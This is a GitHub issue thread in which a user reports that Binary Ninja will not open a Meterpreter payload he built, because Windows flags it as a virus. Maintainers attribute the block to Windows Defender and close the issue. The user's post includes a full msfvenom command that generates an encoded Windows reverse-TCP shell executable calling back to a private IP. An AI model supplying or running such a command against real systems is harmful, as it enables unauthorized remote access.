### ISSUE TITLE
Does not open meterpreter payload

### ISSUE THREAD

**Issue by rhmoult** [Vector35/binaryninja-api#319]
I created a tested, working, binary executable meterpreter payload for Windows in Kali Linux using the option bottom pasted.  Binary Ninja refused to open the binary, giving me the following warning:

![bn](https://cloud.githubusercontent.com/assets/7614599/16281279/9b2da44a-3891-11e6-994d-a1b710ffcbc7.png)

Caption: Operation did not complete successfully because the file contains a virus or potentially unwanted software.

Meterpreter payload options
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=10.10.40.118 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/1.exe

**Comment by plafosse** [comment]
That is really annoying but it seems more like a windows issue not a Binary Ninja issue, we obviously wouldn't do a check like that, its possible that you may need to adjust your Windows defender options.

**Comment by psifertex** [comment]
Going to mark this as closed as it doesn't appear to specifically be a Binary Ninja problem -- let us know if there's a reason that's not the case.
